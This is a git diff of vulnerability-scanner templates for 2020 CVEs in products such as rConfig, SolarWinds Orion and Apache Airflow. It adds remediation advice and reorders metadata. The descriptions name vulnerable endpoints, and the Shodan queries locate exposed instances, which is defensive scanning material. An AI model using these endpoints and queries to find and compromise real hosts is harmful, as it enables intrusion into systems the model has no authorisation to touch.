@@ info: cve-id: CVE-2020-0618 cwe-id: CWE-502 epss-score: 0.97329 - cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* epss-percentile: 0.99813 + cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index cd1c3ddc83..e3adee1559 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected. + remediation: | + Apply the necessary patches or updates provided by SolarWinds to fix the authentication bypass vulnerability. reference: - https://kb.cert.org/vuls/id/843464 - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-10148 cwe-id: CWE-287,CWE-288 epss-score: 0.97347 - cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* epss-percentile: 0.99832 + cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* metadata: max-request: 2 vendor: solarwinds diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index 2ee8173b0e..c1d059a349 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob,pdresearch severity: high description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3. reference: - https://twitter.com/iamnoooob/status/1246182773427240967 - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-10199 cwe-id: CWE-917 epss-score: 0.97217 - cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* epss-percentile: 0.99742 + cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sonatype diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 860bb427fd..de8d836ec7 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -6,20 +6,21 @@ info: severity: critical description: | An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. + remediation: | + Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 classification: - cve-id: CVE-2020-10220 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2020-10220 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"rConfig" tags: cve,cve2020,rconfig,sqli - variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 23b30c0bd9..9ac0547a4a 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + remediation: | + Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-10546 cwe-id: CWE-89 epss-score: 0.4901 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* epss-percentile: 0.97048 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index 6a85d4f949..e067f01b4a 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + remediation: | + Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-10547 cwe-id: CWE-89 epss-score: 0.4901 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* epss-percentile: 0.97048 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index bef309e470..73a02ae839 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + remediation: | + Upgrade to a patched version of rConfig or apply the necessary security patches provided by the vendor. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-10548 cwe-id: CWE-89 epss-score: 0.4901 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* epss-percentile: 0.97048 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 3686f0bf63..7c652142eb 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + remediation: | + Upgrade rConfig to version >3.9.4 or apply the provided patch to mitigate the SQL Injection vulnerability. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-10549 cwe-id: CWE-89 epss-score: 0.4901 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* epss-percentile: 0.97048 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index d110ac274e..7e6ffcad9d 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack. + remediation: | + Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/50405 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-10770 cwe-id: CWE-918 epss-score: 0.37441 - cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* epss-percentile: 0.9668 + cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redhat diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index fbb770a11d..2cb5f89a01 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973 - https://github.com/sudo-jtcsec/Nyra @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-10973 cwe-id: CWE-306 epss-score: 0.03878 - cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* epss-percentile: 0.90774 + cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn530hg4_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2020,exposure,wavlink http: diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 6b8d757e1a..bbff6106f8 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -5,21 +5,21 @@ info: author: pikpikcu severity: medium description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp. + remediation: Upgrade to version 9.4.6 or later. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5WQMONZRWLWOXMHMYWR7A5Q5JJERPMVC/ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q4BG2UTINBVV7MTJRXKBQ26GV2UINA6L/ - remediation: Upgrade to version 9.4.6 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-11034 cwe-id: CWE-601,CWE-185 epss-score: 0.00396 - cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* epss-percentile: 0.7014 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: glpi-project diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 594609b3a9..9ec3a3d338 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -5,26 +5,26 @@ info: author: emadshanab severity: medium description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + remediation: This issue can be resolved by updating Grafana to the latest version. reference: - https://github.com/grafana/grafana/pull/23254 - https://security.netapp.com/advisory/ntap-20200810-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 - https://hackerone.com/reports/1329433 - https://github.com/grafana/grafana/blob/master/CHANGELOG.md - remediation: This issue can be resolved by updating Grafana to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-11110 cwe-id: CWE-79 epss-score: 0.00131 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.47313 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Grafana" vendor: grafana product: grafana + shodan-query: title:"Grafana" tags: cve,cve2020,xss,grafana,hackerone http: diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 67f91bb09e..6703839e83 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -6,20 +6,20 @@ info: severity: high description: | MicroStrategy Web 10.4 is susceptible to information disclosure. The JVM configuration, CPU architecture, installation folder, and other information are exposed through /MicroStrategyWS/happyaxis.jsp. An attacker can use this vulnerability to learn more about the application environment and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Mitigated in all versions 11.0 and higher. reference: - http://packetstormsecurity.com/files/157068/MicroStrategy-Intelligence-Server-And-Web-10.4-XSS-Disclosure-SSRF-Code-Execution.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11450 - https://www.redtimmy.com/web-application-hacking/another-ssrf-another-rce-the-microstrategy-case/ - https://nvd.nist.gov/vuln/detail/cve-2020-11450 - http://seclists.org/fulldisclosure/2020/Apr/1 - remediation: Mitigated in all versions 11.0 and higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 epss-score: 0.34975 - cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* epss-percentile: 0.96566 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index 5e8dcf5627..f39509143e 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + remediation: | + Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability. reference: - https://www.exploit-db.com/exploits/48297 - https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-11455 cwe-id: CWE-22 epss-score: 0.5225 - cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* epss-percentile: 0.97134 + cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: limesurvey diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index 44a2ac4ad0..bfe91be835 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x. + remediation: | + Upgrade Grav CMS to version 1.7 or later to fix the open redirect vulnerability. reference: - https://github.com/getgrav/grav/issues/3134 - https://nvd.nist.gov/vuln/detail/CVE-2020-11529 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-11529 cwe-id: CWE-601 epss-score: 0.00349 - cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* epss-percentile: 0.68242 + cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: getgrav diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 4a66c1e8c0..9ec4e15b97 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-11530 cwe-id: CWE-89 epss-score: 0.65013 - cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* epss-percentile: 0.9744 + cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: idangero product: chop_slider + framework: wordpress tags: wpscan,seclists,cve,cve2020,sqli,wordpress,wp-plugin,wp,chopslider,unauth http: diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index e2fce74085..7b97dcb712 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -5,6 +5,8 @@ info: author: Official_BlackHat13 severity: critical description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection. + remediation: | + Upgrade to the latest version of SuperWebmailer to mitigate this vulnerability. reference: - https://github.com/Official-BlackHat13/CVE-2020-11546/ - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/ @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-11546 cwe-id: CWE-94 epss-score: 0.96429 - cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:* epss-percentile: 0.99376 + cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"SuperWebMailer" vendor: superwebmailer product: superwebmailer + shodan-query: title:"SuperWebMailer" tags: cve,cve2020,rce,superwebmailer http: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 09ca16e599..103e8ce607 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -5,6 +5,8 @@ info: author: x6263 severity: medium description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade PRTG Network Monitor to version 20.1.57.1745 or higher to mitigate the information disclosure vulnerability. reference: - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure - https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-11547 cwe-id: CWE-306 epss-score: 0.0011 - cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* epss-percentile: 0.43305 + cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: title:"prtg" + max-request: 3 vendor: paessler product: "prtg_network_monitor" + shodan-query: title:"prtg" tags: cve,cve2020,prtg,disclosure http: diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index de63450f9e..9375ed7d91 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1. + remediation: | + Upgrade to Kong version 2.0.3 or later to fix the vulnerability and ensure proper authentication and access control mechanisms are in place. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-11710 - https://github.com/Kong/kong @@ -16,13 +18,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11710 epss-score: 0.02084 - cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* epss-percentile: 0.87657 + cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:* metadata: max-request: 1 - framework: kong vendor: konghq product: docker-kong + framework: kong tags: cve,cve2020,kong http: diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 9f810f48bb..92190b5b1a 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -8,6 +8,8 @@ info: WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before. + remediation: | + Update the WordPress Duplicator plugin to the latest version (1.3.27 or higher) to mitigate the vulnerability. reference: - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild - https://snapcreek.com/duplicator/docs/changelog/?lite @@ -20,13 +22,13 @@ info: cve-id: CVE-2020-11738 cwe-id: CWE-22 epss-score: 0.97273 - cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* epss-percentile: 0.99776 + cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: snapcreek product: duplicator + framework: wordpress tags: kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi http: diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 6fba21de14..f91c2de8a3 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories. + remediation: | + Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access. reference: - https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-11798 @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-11798 cwe-id: CWE-22 epss-score: 0.75314 - cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* epss-percentile: 0.97741 + cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"Mitel" html:"MiCollab" + max-request: 1 vendor: mitel product: micollab_audio\,_web_\&_video_conferencing + shodan-query: html:"Mitel" html:"MiCollab" tags: packetstorm,cve,cve2020,mitel,micollab,lfi http: diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 3088685ab1..1b56a867de 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654). + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Micro Focus Operations Bridge Manager. reference: - http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html - https://softwaresupport.softwaregrp.com/doc/KM03747658 @@ -17,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11853 epss-score: 0.94797 - cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* epss-percentile: 0.98954 + cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microfocus diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index f5b8cfeb8b..ca58dfa05d 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3. + remediation: | + Apply the latest security patches or updates provided by Micro Focus to fix this vulnerability. reference: - http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html - https://softwaresupport.softwaregrp.com/doc/KM03747658 @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-11854 cwe-id: CWE-798 epss-score: 0.97414 - cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* epss-percentile: 0.99886 + cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microfocus diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 8eeccfa7a9..67e005fbc9 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. + remediation: | + Update the WordPress GTranslate plugin to version 2.8.52 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/10181 - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.00396 - cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* epss-percentile: 0.70156 + cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - publicwww-query: "/wp-content/plugins/gtranslate" - framework: wordpress vendor: gtranslate product: translate_wordpress_with_gtranslate + framework: wordpress + publicwww-query: "/wp-content/plugins/gtranslate" tags: cve,cve2020,wordpress,wp,xss,wp-plugin,wpscan http: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 98856ddf36..d94be96c6c 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -5,26 +5,26 @@ info: author: pdteam severity: high description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). + remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. reference: - https://github.com/pberba/CVE-2020-11978 - https://twitter.com/wugeej/status/1400336603604668418 - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-78 epss-score: 0.97524 - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* epss-percentile: 0.9998 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" verified: true + max-request: 4 vendor: apache product: airflow + shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" tags: cve,cve2020,apache,airflow,rce,kev http: diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 2ac8c59119..9cb60ee8ce 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -5,24 +5,24 @@ info: author: pikpikcu severity: high description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. + remediation: Upgrade to Apache Cocoon 2.1.13 or later. reference: - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b - https://nvd.nist.gov/vuln/detail/CVE-2020-11991 - 